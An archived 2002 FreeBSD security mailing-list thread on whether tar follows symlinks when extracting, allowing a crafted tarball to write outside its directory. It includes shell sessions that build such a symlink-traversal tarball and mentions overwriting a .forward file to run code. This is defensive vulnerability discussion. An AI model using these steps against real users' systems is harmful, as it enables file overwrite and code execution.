<200210012254.g91MsFvU014326@gw.catspoiler.org> Message-ID: <20021001155652.S67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Don Lewis wrote: > What if the tarball installs a symlink to / under the current directory > followed by files that are unpacked underneath the symlink name? A > simple fix for the initial problem mentioned in this thread isn't > sufficient. i don't believe that tar(1) will allow you to do that by default. i know for a fact that OpenBSD won't do it by default, you have to specify that you want it to follow symlinks: -L Follow all symlinks. In extract mode this means that a di- rectory entry in the archive will not overwrite an existing symbolic link, but rather what the link ultimately points to. > This is hardly a new problem. Here's a 1998 BUGTRAQ message: and, i believe that's been addressed aswell. should have been, considering it's 4 years old now. -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:10:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2A1C737B401 for ; Tue, 1 Oct 2002 16:10:33 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 53ABA43E65 for ; Tue, 1 Oct 2002 16:10:32 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA23833; Tue, 1 Oct 2002 17:10:25 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20021001170815.0345ab20@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 01 Oct 2002 17:10:23 -0600 To: "f.johan.beisser" From: Brett Glass Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) Cc: security@FreeBSD.ORG In-Reply-To: <20021001154626.M67581-100000@pogo.caustic.org> References: <4.3.2.7.2.20021001162821.036c0530@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 04:56 PM 10/1/2002, f.johan.beisser wrote: >i guess i would be more worried about this having the ability to execute >arbitrary code as the user; which it doesn't seem to have. There are dozens of ways that it can. Think ~/.forward with a piped command, for example. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:26: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2AC6F37B401 for ; Tue, 1 Oct 2002 16:26:01 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id E303C43E3B for ; Tue, 1 Oct 2002 16:26:00 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91NPvZ92316; Tue, 1 Oct 2002 16:25:57 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 16:25:57 -0700 (PDT) From: "f.johan.beisser" To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) In-Reply-To: <4.3.2.7.2.20021001170815.0345ab20@localhost> Message-ID: <20021001162006.C67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brett Glass wrote: > There are dozens of ways that it can. Think ~/.forward with a piped > command, for example. sadly, i have to admit that won't work, not without adding in the leading "/". remember that "~" is expanded to "/home/$USER". if you can presume your victim will execute from a specific directory - say "/home/foo/tmp" - you could include "./../../.forward" inside a subdirectory. but, what's the guantee that they will be that consistant? assuming they're untarring in /usr/tmp, /var/tmp, or /tmp will also not really work, unless you're attacking a specific victim, and have pre-existing knowledge of their machines setup. while i do see this as being exploitable, i don't see it being something that can't be overcome by education and warning. -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:30:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 51EDF37B401 for ; Tue, 1 Oct 2002 16:30:29 -0700 (PDT) Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8945E43E75 for ; Tue, 1 Oct 2002 16:30:28 -0700 (PDT) (envelope-from klaus@kobold.compt.com) Date: Tue, 1 Oct 2002 19:30:24 -0400 From: Klaus Steden To: "f.johan.beisser" Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) Message-ID: <20021001193024.A24818@cthulu.compt.com> References: <4.3.2.7.2.20021001160301.034597f0@localhost> <20021001151050.F67581-100000@pogo.caustic.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20021001151050.F67581-100000@pogo.caustic.org>; from jan@caustic.org on Tue, Oct 01, 2002 at 03:21:58PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org With all due respect, running 'tar tf' before extracting a tarball as root is a good idea, and a good habit to get into. Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:31: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 56E1437B401 for ; Tue, 1 Oct 2002 16:30:58 -0700 (PDT) Received: from gw.catspoiler.org (217-ip-163.nccn.net [209.79.217.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1F8C343E77 for ; Tue, 1 Oct 2002 16:30:57 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Received: from mousie.catspoiler.org (mousie.catspoiler.org [192.168.101.2]) by gw.catspoiler.org (8.12.5/8.12.5) with ESMTP id g91NUbvU014409; Tue, 1 Oct 2002 16:30:41 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Message-Id: <200210012330.g91NUbvU014409@gw.catspoiler.org> Date: Tue, 1 Oct 2002 16:30:37 -0700 (PDT) From: Don Lewis Subject: Re: RE: Is FreeBSD's tar susceptible to this? To: jan@caustic.org Cc: brett@lariat.org, kris@obsecurity.org, dillon@apollo.backplane.com, piechota@argolis.org, aaron@namba1.com, security@FreeBSD.ORG In-Reply-To: <20021001155652.S67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 1 Oct, f.johan.beisser wrote: > On Tue, 1 Oct 2002, Don Lewis wrote: > >> What if the tarball installs a symlink to / under the current directory >> followed by files that are unpacked underneath the symlink name? A >> simple fix for the initial problem mentioned in this thread isn't >> sufficient. > > i don't believe that tar(1) will allow you to do that by default. I don't have an easy way of creating a malicious tarball to do this all in one shot, but it does look like our tar follows symlinks. > mkdir foo > touch foo/bar > tar cvf foo.tar foo/bar foo/bar > rm -r foo > mkdir baz > ln -s baz foo > tar xvf foo.tar foo/bar > ls -l baz total 0 -rw-r--r-- 1 dl dl 0 Oct 1 16:17 bar > i know for a fact that OpenBSD won't do it by default, you have to specify > that you want it to follow symlinks: > > -L Follow all symlinks. In extract mode this means that a di- > rectory entry in the archive will not overwrite an existing > symbolic link, but rather what the link ultimately points > to. Our -L option does something entirely different, which is odd since I got the impression from the comments made in this thread that both FreeBSD and OpenBSD are both using gtar. I also don't think the -L option described above (or the lack of it's use) does anything to help the problem. If there is a symbolic link named "foo" in the filesystem and the tarball contains a directory named "foo", then it sounds like the symlink will be removed and replaced with a directory if the "-L" option is not used, and the directory will be created at the target of the symlink if the "-L" option is used. It doesn't seem to say anything about what is done if there is no "foo" directory in the tarball, but the tarball contains a "foo/bar" file. The only safe way of preventing symlinks from being followed would be to lstat() each component of each path name in the tarball (which is still not safe if there is a hostile process running that could substitute a symlink for something that has already been checked). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:37: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ED1E937B401 for ; Tue, 1 Oct 2002 16:37:02 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3F9CB43E77 for ; Tue, 1 Oct 2002 16:37:02 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA24158; Tue, 1 Oct 2002 17:36:55 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20021001173317.034cfe10@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 01 Oct 2002 17:36:51 -0600 To: "f.johan.beisser" From: Brett Glass Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) Cc: security@FreeBSD.ORG In-Reply-To: <20021001162006.C67581-100000@pogo.caustic.org> References: <4.3.2.7.2.20021001170815.0345ab20@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:25 PM 10/1/2002, f.johan.beisser wrote: >sadly, i have to admit that won't work, not without adding in the leading >"/". remember that "~" is expanded to "/home/$USER". I was using the ~ notation as a shorthand. The point is that if you can get at a user's .forward file, that's sufficient to run code as him/her. There are lots of other clever ways, too; that's just the first example that came to mind. Rather than give someone the opportunity to find a clever exploit, I think we'd best just close the hole. ;-) --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:48:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1A45137B401 for ; Tue, 1 Oct 2002 16:48:53 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7303F43E86 for ; Tue, 1 Oct 2002 16:48:51 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91NmeD92481; Tue, 1 Oct 2002 16:48:40 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 16:48:39 -0700 (PDT) From: "f.johan.beisser" To: Don Lewis Cc: brett@lariat.org, , , , , Subject: Re: RE: Is FreeBSD's tar susceptible to this? In-Reply-To: <200210012330.g91NUbvU014409@gw.catspoiler.org> Message-ID: <20021001163239.L67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Don Lewis wrote: > On 1 Oct, f.johan.beisser wrote: > > i don't believe that tar(1) will allow you to do that by default. > > I don't have an easy way of creating a malicious tarball to do this all > in one shot, but it does look like our tar follows symlinks. it doesn't include them by default, though. well, the symlink, yes; the contents of the symlink, no. in your example, overwriting a given simlink works because it's pre-existing, before the untarring of the file. essentially, it's like cd'ing in to a symlinked directory: [jan@hi jan] {102}$ ln -s /tmp tmphome [jan@hi jan] {103}$ ls -al tmphome lrwxr-xr-x 1 jan jan 4 Oct 1 16:38 tmphome -> /tmp [jan@hi jan] {104}$ cd tmphome [jan@hi tmphome] {105}$ pwd /home/jan/tmphome [jan@hi tmphome] {106}$ ls -l drwxr-xr-x 2 jan wheel 512 Aug 1 13:21 ook drwx------ 2 jan wheel 512 Sep 27 13:36 orbit-jan drwxr-xr-x 3 root wheel 512 May 23 16:57 screens if i untar something to $HOME/tmphome, it'll end up in /tmp. > Our -L option does something entirely different, which is odd since I > got the impression from the comments made in this thread that both > FreeBSD and OpenBSD are both using gtar. no, it appears that FreeBSD is using gtar by default, which means the pax(1) link i posted earlier is wrong. From the FreeBSD tar(1) man page: COMPATIBILITY The -y is a FreeBSD localism. The GNU tar maintainer has now choosen -j as the offical bzip2(1) compression option in GNU tar 1.13.18 and later. The -I option is for compatibility with Solaris's tar. [...] HISTORY The tar format has a rich history, dating back to Sixth Edition UNIX. The current implementation of tar is the GNU implementation, which originated as the public-domain tar written by John Gilmore. > I also don't think the -L option described above (or the lack of it's > use) does anything to help the problem. If there is a symbolic link > named "foo" in the filesystem and the tarball contains a directory named > "foo", then it sounds like the symlink will be removed and replaced with > a directory if the "-L" option is not used, and the directory will be > created at the target of the symlink if the "-L" option is used. It > doesn't seem to say anything about what is done if there is no "foo" > directory in the tarball, but the tarball contains a "foo/bar" file. the -L flag in OpenBSD's tar will permit tar to follow symlinks, vs overwriting them or, worse, allowing something to overwrite outside of the untarring location. this assumes i'm reading the man page correctly. > The only safe way of preventing symlinks from being followed would be to > lstat() each component of each path name in the tarball (which is still > not safe if there is a hostile process running that could substitute a > symlink for something that has already been checked). if you have a hostile process, you tend to be forced in to assuming the machine is hostile anyway, yes? -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16:50:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9054337B401 for ; Tue, 1 Oct 2002 16:50:17 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3E1C343E75 for ; Tue, 1 Oct 2002 16:50:17 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91NoEs92505; Tue, 1 Oct 2002 16:50:14 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 16:50:14 -0700 (PDT) From: "f.johan.beisser" To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) In-Reply-To: <4.3.2.7.2.20021001173317.034cfe10@localhost> Message-ID: <20021001164903.H67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brett Glass wrote: > I was using the ~ notation as a shorthand. The point is that if you can > get at a user's .forward file, that's sufficient to run code as him/her. > There are lots of other clever ways, too; that's just the first > example that came to mind. ah, sorry. i've been working on scripts today. i'm in a little bit of a literallist mindset. > Rather than give someone the opportunity to find a clever exploit, I think > we'd best just close the hole. ;-) well, agreed. -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 17:12:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8848C37B401 for ; Tue, 1 Oct 2002 17:12:44 -0700 (PDT) Received: from gw.catspoiler.org (217-ip-163.nccn.net [209.79.217.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9F8FB43E3B for ; Tue, 1 Oct 2002 17:12:40 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Received: from mousie.catspoiler.org (mousie.catspoiler.org [192.168.101.2]) by gw.catspoiler.org (8.12.5/8.12.5) with ESMTP id g920CRvU014531; Tue, 1 Oct 2002 17:12:31 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Message-Id: <200210020012.g920CRvU014531@gw.catspoiler.org> Date: Tue, 1 Oct 2002 17:12:27 -0700 (PDT) From: Don Lewis Subject: Re: RE: Is FreeBSD's tar susceptible to this? To: jan@caustic.org Cc: brett@lariat.org, kris@obsecurity.org, dillon@apollo.backplane.com, piechota@argolis.org, aaron@namba1.com, security@FreeBSD.ORG In-Reply-To: <20021001163239.L67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 1 Oct, f.johan.beisser wrote: > On Tue, 1 Oct 2002, Don Lewis wrote: > >> On 1 Oct, f.johan.beisser wrote: >> > i don't believe that tar(1) will allow you to do that by default. >> >> I don't have an easy way of creating a malicious tarball to do this all >> in one shot, but it does look like our tar follows symlinks. I forgot about tar's "r" option ... > it doesn't include them by default, though. well, the symlink, yes; the > contents of the symlink, no. > > in your example, overwriting a given simlink works because it's > pre-existing, before the untarring of the file. essentially, it's like > cd'ing in to a symlinked directory: The symlink doesn't have to exist ahead of time. % rm -rf foo baz % ls foo baz ls: baz: No such file or directory ls: foo: No such file or directory % ln -s baz foo % tar cvf foo.tar foo foo % rm foo % mkdir foo baz % touch foo/bar % tar rvf foo.tar foo/bar foo/bar % rm -r foo % tar xvf foo.tar foo foo/bar % ls -al foo baz lrwxr-xr-x 1 dl dl 3 Oct 1 17:01 foo -> baz baz: total 28 drwxr-xr-x 2 dl dl 512 Oct 1 17:01 . drwxr-xr-x 64 dl dl 27648 Oct 1 17:01 .. -rw-r--r-- 1 dl dl 0 Oct 1 17:00 bar >> The only safe way of preventing symlinks from being followed would be to >> lstat() each component of each path name in the tarball (which is still >> not safe if there is a hostile process running that could substitute a >> symlink for something that has already been checked). > > if you have a hostile process, you tend to be forced in to assuming the > machine is hostile anyway, yes? Yes, I just didn't want anyone to get the impression that the checks that I mentioned above are safe in all cases. In the general case, even those checks are vulnerable to things like /tmp races. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 18:30:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 40B4437B401 for ; Tue, 1 Oct 2002 18:30:53 -0700 (PDT) Received: from hyperreal.org (taz3.hyperreal.org [209.133.83.22]) by mx1.FreeBSD.org (Postfix) with SMTP id D7A2543E65 for ; Tue, 1 Oct 2002 18:30:52 -0700 (PDT) (envelope-from brian@hyperreal.org) Received: (qmail 12671 invoked from network); 2 Oct 2002 01:30:39 -0000 Received: from localhost.hyperreal.org (HELO yez.hyperreal.org) (127.0.0.1) by localhost.hyperreal.org with SMTP; 2 Oct 2002 01:30:39 -0000 Received: (qmail 76388 invoked by uid 1000); 2 Oct 2002 01:31:28 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 2 Oct 2002 01:31:28 -0000 Date: Tue, 1 Oct 2002 18:31:28 -0700 (PDT) From: Brian Behlendorf To: Klaus Steden Cc: security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) In-Reply-To: <20021001193024.A24818@cthulu.compt.com> Message-ID: <20021001183010.E58068-100000@yez.hyperreal.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost.hyperreal.org 1.6.2 900/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Klaus Steden wrote: > With all due respect, running 'tar tf' before extracting a tarball as root is > a good idea, and a good habit to get into. So, fix the ports system then to include a step whereby someone has to pause the installation process to review the output of tar before allowing it to proceed. Oh, that would be a pain, wouldn't it? Like someone said, POLA. Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 19:12:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7254C37B401 for ; Tue, 1 Oct 2002 19:12:15 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3479543E75 for ; Tue, 1 Oct 2002 19:12:15 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g922CC793357; Tue, 1 Oct 2002 19:12:12 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 19:12:11 -0700 (PDT) From: "f.johan.beisser" To: Brian Behlendorf Cc: Klaus Steden , Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) In-Reply-To: <20021001183010.E58068-100000@yez.hyperreal.org> Message-ID: <20021001190915.K67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brian Behlendorf wrote: > So, fix the ports system then to include a step whereby someone has to > pause the installation process to review the output of tar before allowing > it to proceed. if you're installing a port, i would tend to assume it's A) from the FreeBSD ports tree, and B) checked out, and using an md5 hash (already in the tree) that's separate/updated by the maintainer. in this case, the port maintainer is directly responsible for the port. of course, you have to trust your port maintainer to not be out to cause harm. trust does have to begin somewhere, after all. -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 2 1:42:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 717CF37B406 for ; Wed, 2 Oct 2002 01:42:08 -0700 (PDT) Received: from pegasus.wanadoo.be (pegasus.wanadoo.be [195.74.212.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id E118943E3B for ; Wed, 2 Oct 2002 01:42:06 -0700 (PDT) (envelope-from nick@wanadoo.be) Received: from nemesis.euronet.be (inphobia.office.be.wanadoo.com [195.74.207.35]) by pegasus.wanadoo.be (8.12.0/8.12.0) with SMTP id g928g475028313 for ; Wed, 2 Oct 2002 10:42:05 +0200 (MET DST) Date: Wed, 2 Oct 2002 10:42:03 +0200 From: Nick Nauwelaerts To: security@FreeBSD.ORG Subject: Re: Is FreeBSD's tar susceptible to this? Message-Id: <20021002104203.3abf8486.nick@wanadoo.be> In-Reply-To: <4.3.2.7.2.20021001113225.034331b0@localhost> References: <4.3.2.7.2.20021001104558.00d3f900@localhost> <4.3.2.7.2.20021001113225.034331b0@localhost> X-Mailer: Sylpheed version 0.8.3 (GTK+ 1.2.10; i386-unknown-openbsd3.1) X-Face: *=F*],{/L+"n0:jcG_+H@{$PsEWe]S[;DyQh3c)%M1@4jsmih3ro|CRLlJ9/DsQWt3M}!x#l@? Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-DCC-wanadoo-be-Metrics: pegasus 1023; Body=1 Fuz1=1 Fuz2=1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 01 Oct 2002 11:35:03 -0600 Brett Glass wrote: > Unfortunately, GNU tar has become so pervasive > that even OpenBSD (which avoids GNU software) uses > it. Gotta break this dependency upon GPLed code. FreeBSD's, NetBSD's & OpenBSD's tar/pax is BSD licensed, not GLPed. // nick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 2 1:54:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5304C37B401 for ; Wed, 2 Oct 2002 01:54:50 -0700 (PDT) Received: from obsecurity.dyndns.org (adsl-64-165-226-88.dsl.lsan03.pacbell.net [64.165.226.88]) by mx1.FreeBSD.org (Postfix) with ESMTP id 905A043E3B for ; Wed, 2 Oct 2002 01:54:49 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 134B466B79; Wed, 2 Oct 2002 01:54:49 -0700 (PDT) Date: Wed, 2 Oct 2002 01:54:48 -0700 From: Kris Kennaway To: Nick Nauwelaerts Cc: security@FreeBSD.ORG Subject: Re: Is FreeBSD's tar susceptible to this? Message-ID: <20021002085448.GA67610@xor.obsecurity.org> References: <4.3.2.7.2.20021001104558.00d3f900@localhost> <4.3.2.7.2.20021001113225.034331b0@localhost> <20021002104203.3abf8486.nick@wanadoo.be> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="DocE+STaALJfprDB" Content-Disposition: inline In-Reply-To: <20021002104203.3abf8486.nick@wanadoo.be> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --DocE+STaALJfprDB Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Oct 02, 2002 at 10:42:03AM +0200, Nick Nauwelaerts wrote: > On Tue, 01 Oct 2002 11:35:03 -0600 > Brett Glass wrote: >=20 > > Unfortunately, GNU tar has become so pervasive > > that even OpenBSD (which avoids GNU software) uses > > it. Gotta break this dependency upon GPLed code. >=20 > FreeBSD's, NetBSD's & OpenBSD's tar/pax is BSD licensed, not GLPed. This thread is off-topic. Please restrain yourself from continuing the discussion in this forum. Kris --DocE+STaALJfprDB Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9mrRYWry0BWjoQKURAqxYAKCEQqsuFwmzYc/SBzsJEGkEfdvkiACg7J3l OKBPxoaky1AD+3P3db4jSrE= =ZsoO -----END PGP SIGNATURE----- --DocE+STaALJfprDB-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 2 8:56:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 64ECB37B695 for ; Wed, 2 Oct 2002 08:56:31 -0700 (PDT) Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3CCDF43E77 for ; Wed, 2 Oct 2002 08:56:11 -0700 (PDT) (envelope-from keramida@ceid.upatras.gr) Received: from hades.hell.gr (patr530-b196.otenet.gr [212.205.244.204]) by mailsrv.otenet.gr (8.12.4/8.12.4) with ESMTP id g92FtYdY006655; Wed, 2 Oct 2002 18:55:47 +0300 (EEST) Received: from hades.hell.gr (hades [127.0.0.1]) by hades.hell.gr (8.12.6/8.12.6) with ESMTP id g92FtWmM001819; Wed, 2 